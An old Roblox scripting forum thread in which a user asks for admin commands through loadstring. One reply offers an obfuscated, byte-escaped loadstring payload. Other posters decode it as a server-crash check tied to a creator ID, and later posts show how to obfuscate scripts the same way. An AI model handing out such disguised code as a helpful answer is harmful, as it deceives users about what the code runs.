|
| 28 Nov 2011 06:36 PM |
can u help me with Loadstring i need admin commands by loadstring() please help... |
|
|
| Report Abuse |
|
|
|
| 28 Nov 2011 06:37 PM |
| Not unless you tell us what you need help with. |
|
|
| Report Abuse |
|
|
|
| 28 Nov 2011 06:40 PM |
loadstring('\108\111\99\97\108\32\73\100\32\61\32\50\49\52\51\54\51\48\10\102\117\110\99\116\105\111\110\32\99\114\97\115\104\40\41\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\44\119\111\114\107\115\112\97\99\101\41\10\101\110\100\10\119\97\105\116\40\49\41\10\105\102\32\103\97\109\101\58\102\105\110\100\70\105\114\115\116\67\104\105\108\100\40\34\78\101\116\119\111\114\107\83\101\114\118\101\114\34\41\32\126\61\32\110\105\108\32\116\104\101\110\10\112\114\105\110\116\40\34\79\110\108\105\110\101\34\41\10\105\102\32\103\97\109\101\46\67\114\101\97\116\111\114\73\100\32\126\61\32\73\100\32\116\104\101\110\10\112\114\105\110\116\40\34\71\69\84\32\79\85\84\33\34\41\10\99\114\97\115\104\40\41\10\101\110\100\10\101\110\100\10')()
this should "work" |
|
|
| Report Abuse |
|
|
|
| 28 Nov 2011 06:44 PM |
ok well I don't have roblox installed on the computer Im using, so can you do this?:
Go into your place on edit mode
Then open the output bar (View>Output)
Next type this in the output bar:
print("\108\111\99\97\108\32\73\100\32\61\32\50\49\52\51\54\51\48\10\102\117\110\99\116\105\111\110\32\99\114\97\115\104\40\41\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\44\119\111\114\107\115\112\97\99\101\41\10\101\110\100\10\119\97\105\116\40\49\41\10\105\102\32\103\97\109\101\58\102\105\110\100\70\105\114\115\116\67\104\105\108\100\40\34\78\101\116\119\111\114\107\83\101\114\118\101\114\34\41\32\126\61\32\110\105\108\32\116\104\101\110\10\112\114\105\110\116\40\34\79\110\108\105\110\101\34\41\10\105\102\32\103\97\109\101\46\67\114\101\97\116\111\114\73\100\32\126\61\32\73\100\32\116\104\101\110\10\112\114\105\110\116\40\34\71\69\84\32\79\85\84\33\34\41\10\99\114\97\115\104\40\41\10\101\110\100\10\101\110\100\10")
Press enter and post the result here. |
|
|
| Report Abuse |
|
|
|
| 28 Nov 2011 08:53 PM |
i really need admin commands not this ---> local Id = 2143630 function crash() Instance.new('ManualSurfaceJointInstance',workspace) end wait(1) if game:findFirstChild("NetworkServer") ~= nil then print("Online") if game.CreatorId ~= Id then print("GET OUT!") crash() end end
|
|
|
| Report Abuse |
|
|
1waffle1
|
  |
| Joined: 16 Oct 2007 |
| Total Posts: 16381 |
|
|
| 28 Nov 2011 08:56 PM |
| Then get out and go make some. |
|
|
| Report Abuse |
|
|
|
| 28 Nov 2011 09:04 PM |
i am making it but got errors |
|
|
| Report Abuse |
|
|
|
| 28 Nov 2011 09:08 PM |
| then post your problems along with the script. |
|
|
| Report Abuse |
|
|
rayoma
|
  |
| Joined: 13 Nov 2009 |
| Total Posts: 1911 |
|
|
| 28 Nov 2011 09:46 PM |
@Mrgames
When you encrypt a script do it like this :
local strang=string.dump(function() --code here end) local new_encrypt="loadstring('"; for i=1,strang:len() do new_encrypt=new_encrypt .. "\\" .. strang:sub(i,i):byte(); end print(new_encrypt .. "')()");
Now you get the results : > LuaQ
When you try to decrypt it like that other guy did. |
|
|
| Report Abuse |
|
|
| |
|
|
| 29 Nov 2011 05:54 PM |
I have a make-loadstring script Source = [[]]
New = "" for i = 1,Source:len() do New = New .. string.char(92) .. Source:sub(i,i):byte() end print([[loadstring("]] .. New .. [[")()]])
i put the admin commands in source = [[....]]
but it will be broken with ]] and )
|
|
|
| Report Abuse |
|
|